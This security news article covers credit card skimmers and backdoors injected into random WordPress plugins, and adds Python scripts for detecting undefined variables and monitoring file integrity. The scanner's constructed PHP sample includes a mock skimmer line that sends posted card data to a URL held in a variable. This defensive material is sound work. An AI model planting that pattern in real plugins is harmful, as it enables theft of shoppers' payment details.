Hackers infect random WordPress plugins to steal credit cards

Credit card skimmers are being injected into random plugins on WordPress e-commerce sites, hiding from detection while stealing customers' payment details.

With the Christmas shopping season in full swing, card-theft threat actors are stepping up their efforts to infect online stores with stealthy skimmers, so admins need to remain vigilant.

The latest trend is to inject card skimmers into WordPress plugin files, avoiding the closely watched core “wp-admin” and “wp-includes” directories, where most injections are short-lived.

Hiding in plain sight

According to a new report from Sucuri, credit card thieves first compromise a WordPress site and inject a backdoor into it for persistence.

These backdoors let the attackers retain access to the site even if the administrator installs the latest security updates for WordPress and the installed plugins.

When the attackers later use the backdoor, it looks up the list of administrator users and uses one of their authorization cookies, together with the current user's login, to access the site.

Backdoor injection in site files
Source: Sucuri

The threat actors then add their malicious code to random plugins and, according to Sucuri, many of the scripts are not even obfuscated.

Unobfuscated code added to a plugin
Source: Sucuri

On reviewing the code, however, analysts noticed that an image optimization plugin contained references to WooCommerce and used variables that were never defined in the file. The plugin itself has no vulnerability; the threat actors appear to have picked it at random.

Using PHP's ‘get_defined_vars()’ at runtime, Sucuri found that one of these undefined variables held a domain hosted on an Alibaba server in Germany.

That domain had nothing to do with the compromised website under investigation, which does business in North America.

The same site had a second injection, in a 404-page plugin, which contained the actual credit card skimmer and used the same approach of variables hidden in unobfuscated code.

In this case the ‘$thelist’ and ‘$message’ variables supported the credit card skimming malware: the first held the receiving URL and the second used ‘file_get_contents()’ to retrieve the payment details.

Variable-based skimmer functionality
Source: Sucuri
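Sucuri resolved the mystery variables at runtime with get_defined_vars(). The same tell can be found offline: a plugin file that reads variables it never assigns, and that feeds a variable rather than a literal into file_get_contents(), deserves a closer look. The script below is an added illustration written for this page, not code from Sucuri or from any WordPress plugin; the PHP sample it scans is constructed, and the plugin name, function name and variable names in it are made up to mirror the pattern described above.

```python
"""Heuristic scan of a PHP plugin file for the pattern described in the report:
variables referenced but never assigned in the file, and file_get_contents()
calls whose target is a variable instead of a literal URL."""
import re

# Constructed sample (hypothetical plugin and function names). The last block
# mimics an unobfuscated injection: $thelist and $message come from nowhere.
SAMPLE_PLUGIN = r'''<?php
/*
Plugin Name: Image Tidy (constructed sample, not a real plugin)
*/
function it_shrink($path, $quality = 80) {
    $size = filesize($path);
    foreach (array('jpg', 'png') as $ext) {
        if (substr($path, -3) === $ext && $size > 0) {
            return $quality;
        }
    }
    return 0;
}

// Injected block in the style described in the report: no obfuscation,
// but $thelist and $message are never assigned anywhere in this file.
if (isset($_POST['card_number'])) {
    $reply = file_get_contents($thelist . '?d=' . base64_encode($message));
}
'''

VAR_RE = re.compile(r"\$(\w+)")
# PHP superglobals and $this are defined by the engine, never by the file.
BUILTIN_VARS = {"GLOBALS", "_SERVER", "_GET", "_POST", "_FILES", "_COOKIE",
                "_SESSION", "_REQUEST", "_ENV", "this"}

# Ways a variable can legitimately receive a value inside one file. Every
# $name found in the matched text is treated as assigned.
ASSIGN_PATTERNS = [
    re.compile(r"\$\w+\s*(?:[.+\-*/%&|^]|\*\*|\?\?|<<|>>)?=(?!=)"),  # $x = / $x .= ...
    re.compile(r"\bfunction\s*\w*\s*\([^)]*\)"),                     # parameters
    re.compile(r"\bas\s+(?:\$\w+\s*=>\s*)?&?\$\w+"),                  # foreach ... as
    re.compile(r"\b(?:global|static)\s+\$\w+(?:\s*,\s*\$\w+)*"),
    re.compile(r"\bcatch\s*\([^)]*\$\w+\)"),
]
REMOTE_READ_RE = re.compile(r"file_get_contents\s*\(\s*\$(\w+)")


def assigned_variables(php: str) -> set:
    """Names that are given a value somewhere in the file."""
    assigned = set()
    for pattern in ASSIGN_PATTERNS:
        for match in pattern.finditer(php):
            assigned.update(VAR_RE.findall(match.group(0)))
    return assigned


def scan_plugin(php: str) -> dict:
    """Return undefined variable names and (line, variable) pairs for
    file_get_contents() calls whose target starts with a variable."""
    referenced = set(VAR_RE.findall(php))
    undefined = sorted(referenced - assigned_variables(php) - BUILTIN_VARS)
    fetches = [(php.count("\n", 0, m.start()) + 1, m.group(1))
               for m in REMOTE_READ_RE.finditer(php)]
    return {"undefined": undefined, "variable_fetches": fetches}


if __name__ == "__main__":
    import sys
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PLUGIN
    print(scan_plugin(source))
```

Run it against a real plugin file with `python scan.py wp-content/plugins/<plugin>/<file>.php`. A legitimate plugin rarely shows undefined variables outside of include files that deliberately share scope, so any hit, especially one combined with a variable-driven file_get_contents(), is worth opening the file for.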

How to protect yourself against card skimmers

There are several safeguards administrators can apply to keep their sites free of skimmers, or at least to keep the time an infection goes unnoticed as short as possible.

First, restrict the wp-admin area to specific IP addresses. Then, even if a backdoor is injected, the attackers would not be able to reach the dashboard, even with stolen administrator cookies. Note that this only covers the admin panel; code injected into a plugin file is reachable without it, which is why the next two steps matter.

Second, implement file integrity monitoring with an active server-side scanner, so that no code change on the site goes unnoticed for long.

Finally, get into the habit of reading the logs and looking closely at the details. File changes, theme changes and plugin updates, for example, are always reflected in the logs.
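As an added illustration of the second step (not Sucuri's scanner, nor part of WordPress), the script below baselines the SHA-256 of every file under a plugins directory and reports files that were added, removed or modified since the baseline. The plugin names and file contents in the demo are constructed; a real deployment would store the baseline outside the web root and run the check from cron. The IP restriction in the first step is web-server configuration rather than code and is not shown here.

```python
"""Minimal file-integrity baseline and check for a WordPress plugins tree.
Added example for this article; assumes the directory is readable and the
baseline JSON is kept somewhere the web server cannot write to."""
import hashlib
import json
import sys
import tempfile
from pathlib import Path


def hash_tree(root: Path) -> dict:
    """Map each file under root (relative POSIX path) to its SHA-256 hex digest."""
    digests = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        digest = hashlib.sha256()
        with path.open("rb") as fh:
            for chunk in iter(lambda: fh.read(1 << 16), b""):
                digest.update(chunk)
        digests[path.relative_to(root).as_posix()] = digest.hexdigest()
    return digests


def compare(baseline: dict, current: dict) -> dict:
    """Diff two hash maps: new files, deleted files, files whose hash changed."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys()
                           if baseline[k] != current[k]),
    }


def demo() -> dict:
    """Constructed walk-through: baseline a fake plugins tree, tamper with it
    the way the report describes (code appended to an unrelated plugin plus a
    dropped file), and return the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        plugins = Path(tmp) / "wp-content" / "plugins"
        for name in ("image-tidy", "custom-404"):          # hypothetical plugins
            (plugins / name).mkdir(parents=True)
            (plugins / name / f"{name}.php").write_text("<?php\n// clean plugin\n")
        baseline = hash_tree(plugins)

        with (plugins / "image-tidy" / "image-tidy.php").open("a") as fh:
            fh.write("\nfile_get_contents($thelist);\n")   # injected line
        (plugins / "custom-404" / "cache.php").write_text("<?php\n// dropped file\n")
        return compare(baseline, hash_tree(plugins))


if __name__ == "__main__":
    # Usage: fim.py baseline <plugins_dir> <baseline.json>
    #        fim.py check    <plugins_dir> <baseline.json>
    if len(sys.argv) != 4:
        print(demo())
        sys.exit(0)
    mode, plugins_dir, baseline_file = sys.argv[1], Path(sys.argv[2]), Path(sys.argv[3])
    if mode == "baseline":
        baseline_file.write_text(json.dumps(hash_tree(plugins_dir), indent=1))
    elif mode == "check":
        report = compare(json.loads(baseline_file.read_text()), hash_tree(plugins_dir))
        print(json.dumps(report, indent=1))
        sys.exit(1 if any(report.values()) else 0)
```

Re-baseline deliberately after every plugin or theme update, and only after confirming the change in the logs that the third step asks you to read; a non-zero exit from `check` at any other time is exactly the "code change that should not go unnoticed" the article warns about.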
